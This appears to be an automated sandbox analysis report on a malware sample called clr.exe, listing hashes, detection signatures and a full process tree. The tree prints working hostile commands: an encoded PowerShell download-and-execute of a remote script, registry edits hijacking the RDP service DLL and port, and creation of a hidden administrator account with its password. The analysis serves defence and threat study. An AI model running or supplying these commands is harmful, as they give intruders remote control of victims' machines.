Overview

overview

10

Static

static

clr.exe

windows7_x64

10

clr.exe

windows10_x64

10

Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    26-10-2021 09:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    clr.exe

  • Size

    5.7MB

  • MD5

    63151e4f7c3972f18a23c0e9996e14ef

  • SHA1

    5d041fde6433a8ff8fc78a69fca1fd4630e3f270

  • SHA256

    cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

  • SHA512

    f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

Score
10/10
persistenceupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\clr.exe
    "C:\Users\Admin\AppData\Local\Temp\clr.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k40toqa5\k40toqa5.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:860
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFA5.tmp" "c:\Users\Admin\AppData\Local\Temp\k40toqa5\CSCA31C43F07C2B42F88294B47B99DC8F4.TMP"
          4⤵
            PID:4020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2244
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2224
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2712
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1064
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1348
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:3540
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2104
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3696
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3212
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3952
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2652
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1536
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2220
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3020
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:3400
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2916
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1204
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1560
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:2020
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc Y0ksT0P9 /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:360
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc Y0ksT0P9 /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3124
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc Y0ksT0P9 /add
                          3⤵
                            PID:932
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:316
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2212
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:4020
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2984
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2472
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                              3⤵
                                PID:1720
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2244
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1336
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:3892
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc Y0ksT0P9
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:348
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc Y0ksT0P9
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2952
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc Y0ksT0P9
                                  3⤵
                                    PID:3184
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3584
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:2916
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:3152
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                      PID:3080
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                      PID:3696
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        2⤵
                                          PID:1572
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:596

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • memory/596-385-0x0000023D6CF90000-0x0000023D6CF92000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/596-387-0x0000023D6CF93000-0x0000023D6CF95000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/596-401-0x0000023D6CF96000-0x0000023D6CF98000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/596-452-0x0000023D6CF98000-0x0000023D6CF99000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-139-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-125-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-132-0x00000211F7C30000-0x00000211F7C32000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-135-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-140-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-131-0x00000211FA840000-0x00000211FA841000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-130-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-129-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-144-0x00000211F7C36000-0x00000211F7C38000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-128-0x00000211F7BE0000-0x00000211F7BE1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-127-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-126-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-133-0x00000211F7C33000-0x00000211F7C35000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-149-0x00000211FA7C0000-0x00000211FA7C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-124-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-151-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-153-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-154-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-156-0x00000211FAE20000-0x00000211FAE21000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-157-0x00000211FB1B0000-0x00000211FB1B1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-158-0x00000211F7C38000-0x00000211F7C39000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/952-123-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/952-122-0x00000211F5F10000-0x00000211F5F12000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-179-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-166-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-170-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-171-0x0000019908F30000-0x0000019908F32000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-172-0x0000019908F33000-0x0000019908F35000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-173-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-175-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-176-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-178-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-168-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-181-0x0000019908F36000-0x0000019908F38000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-167-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-215-0x0000019908F38000-0x0000019908F3A000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1168-169-0x0000019908AC0000-0x0000019908AC2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2244-270-0x000002B400BF3000-0x000002B400BF5000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2244-269-0x000002B400BF0000-0x000002B400BF2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2244-297-0x000002B400BF8000-0x000002B400BFA000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2244-296-0x000002B400BF6000-0x000002B400BF8000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2668-247-0x0000023ECD653000-0x0000023ECD655000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2668-216-0x0000023ECD650000-0x0000023ECD652000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2668-248-0x0000023ECD656000-0x0000023ECD658000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2668-268-0x0000023ECD658000-0x0000023ECD65A000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3144-119-0x000002ECEEF35000-0x000002ECEEF36000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3144-115-0x000002ECEF350000-0x000002ECEF74F000-memory.dmp

                                        Filesize

                                        4.0MB

                                        Download

                                      • memory/3144-117-0x000002ECEEF30000-0x000002ECEEF32000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3144-120-0x000002ECEEF36000-0x000002ECEEF37000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3144-118-0x000002ECEEF33000-0x000002ECEEF35000-memory.dmp

                                        Filesize

                                        8KB

                                        Download